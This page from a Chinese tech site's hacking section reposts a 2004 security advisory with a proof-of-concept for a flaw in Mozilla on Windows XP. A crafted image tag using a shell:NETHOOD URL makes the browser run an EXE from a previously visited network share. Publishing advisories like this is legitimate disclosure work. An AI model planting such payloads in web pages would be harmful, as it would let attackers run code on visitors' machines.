Your Ad Here
首页 | 编程语言 | 网站建设 | 游戏天堂 | 冲浪宝典 | 网络安全 | 操作系统 | 软件时空 | 硬件指南 | 病毒相关 | IT 认证
软讯网络 > 网络安全 > 黑客技术 > 远程运行可执行程序的shell代码
【标  题】:远程运行可执行程序的shell代码
【关键字】:代码,程序,远程,shell,shell
【来  源】:网络

远程运行可执行程序的shell代码

Your Ad Here SUBJ: MOZILLA: SHELL can execute remote EXE program
DATE: 2004/07/09
FROM: Liu Die Yu <liudieyu AT umbrella D0T name>
#####################################
[START] Advisory

COPYRIGHT
---------
This Advisory is Copyright (c) 2004 "Liu Die Yu".
You may distribute it unmodified.
You may not modify it and distribute it or distribute
parts of it without the
author's written permission.
( To contact "Liu Die Yu": email: liudieyu AT UMBRELLA d0t NAME )


TESTED
------
MOZILLA("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040616")
running on winxp.en.home.sp1a.up2date.20040709


PROCESS
-------
Victim visits a shared folder named "shared" on a server
named "X-6487ohu4s6x0p".
This will create a shortcut named "shared on
X-6487ohu4s6x0p" in the folder at "shell:NETHOOD"

At last, make MOZILLA request the following URL:

shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe

A file named "fileid.exe" in the "shared" folder will be executed.


REFERENCE
---------
MOZILLA will open/execute a file when navigated to a valid SHELL-protocol url:
http://seclists.org/lists/fulldisclosure/2004/Jul/0333.html
greetingz fly to perrymonj.

WINDOWS support "shell:NETHOOD":
http://does-not-exist.org/mail-archives/bugtraq/msg02171.html
thanks to malware for his additional research ,
and Cheng Peng Su for his
original discovery.

liudieyu
http://umbrella.name


#########################
[START] PROOF OF CONCEPT
#######################
<!--
MOZILLA REMOTE COMPROMISE DEMO

REPLACE "[" WITH "<", and REPLACE "]" WITH ">".

!!!!! WARNING !!!!!
THIS DEMO WILL NOT WORK WITHOUT PROPER MODIFICATION.

PROCESS:
1. VICTIM VISITS A SHARED FOLDER NAMED "shared" ON A SERVER NAMED
"X-6487ohu4s6x0p".
THIS WILL CREATE A SHORTCUT NAMED "shared on
X-6487ohu4s6x0p" IN THE FOLDER
AT "shell:NETHOOD"
2. VICTIM OPENS THIS HTML FILE WHICH EXECUTES A FILE
NAMED "fileid.exe" IN THE
"shared" FOLDER.


CREATED BY:
"Liu Die Yu" -> LIUDIEYU at UMBRELLA D0T NAME

COPYRIGHT:
This Demo is Copyright (c) 2004 "Liu Die Yu".
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts of it without the
author's written permission.
( To contact "Liu Die Yu": email: liudieyu AT UMBRELLA d0t NAME )
-->

[IMG SRC="shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe"]

http://seclists.org/lists/fulldisclosure/2004/Jul/0425.html

IIS5_IDQ命令行溢出程序源代码--snake 四:【上一篇】
DELPHI开发Web程序常见问题:【下一篇】
【相关文章】
  • IIS5_IDQ命令行溢出程序源代码--snake 四
  • The Basics of Shellcoding(1)
  • 调试并修改一个小的内存驻留程序
  • The Basics of Shellcoding(2)
  • The Basics of Shellcoding(3)
  • MS04-011远程缓冲区溢出代码
  • 程序高手的心得 写好C程序的10条秘籍
  • 黑客Web+Center SQL Injection代码
  • 用VB编写入侵监听程序
  • 高质量C++/C编程指南 -- 附录A :C++/C代码审查表
  • 【随机文章】
  • 我的blog也开通了
  • C#中可以通过Assembly来动态加载DLL
  • 把字符串中不规则的空格取掉或换成"/"
  • 只有编译器喜欢的语法
  • 一套做界面的小控件
  • 学而不思则罔之write调用的原子性
  • 用jsp对oracle的clob字段进行操作
  • DHTML介绍:(1)
  • dopod p800不能同步的问题
  • Windows消息大全
  • 【相关评论】
    没有相关评论
    【发表评论】
    姓名:
    邮件:
    随机码*
    评论*
          
    |  首 页  |  版权声明  |  联系我们   |  网站地图  |
    CopyRight © 2004-2007 bbb软讯网络 All Rigths Reserved.